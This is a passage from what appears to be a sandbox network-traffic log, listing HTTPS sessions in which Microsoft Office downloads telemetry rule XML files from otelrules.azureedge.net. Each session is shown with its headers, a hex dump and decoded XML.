                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    114192.168.2.64982013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:52 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: b15ffdf0-e01e-0051-2acd-4584b2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010052Z-174f7845968j6t2phC1EWRcfe800000016w000000000axar
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    115192.168.2.64982113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:52 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: bf3e87d7-c01e-0046-72f3-442db9000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010052Z-174f7845968j6t2phC1EWRcfe800000016t000000000mzbh
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    116192.168.2.64982213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:53 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:53 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:53 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 46703850-c01e-002b-03cc-456e00000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010053Z-1746fd949bdjrnwqhC1EWRpg2800000000mg00000000443u
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:53 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    117192.168.2.64982313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:54 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:54 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:54 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: a6a36225-101e-000b-71ce-455e5c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010054Z-174f78459684bddphC1EWRbht400000016dg00000000f5t1
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:54 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    118192.168.2.64982413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:54 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:55 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4f5c15a4-401e-0067-28ce-4509c2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010055Z-174f7845968n2hr8hC1EWR9cag00000016bg00000000aa20
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    119192.168.2.64982613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:54 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:58 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 52797c88-801e-00ac-33cb-45fd65000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010058Z-1746fd949bdmv56chC1EWRypnn00000000rg0000000022xv
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:58 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    120192.168.2.64982513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:54 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:55 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 77ea0a00-001e-0066-6ed3-45561e000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010055Z-1746fd949bd54zxghC1EWRzre400000000ng00000000sd5u
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    121192.168.2.64982713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:55 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1399
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0e3f3dcd-301e-001f-2cd1-45aa3a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010055Z-174f784596886s2bhC1EWR743w00000016n000000000sfxt
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:55 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    122192.168.2.64982813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:56 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:56 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 1362
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: f4a7b183-b01e-0098-27d5-43cead000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010056Z-174f78459685m244hC1EWRgp2c00000016k000000000b0fc
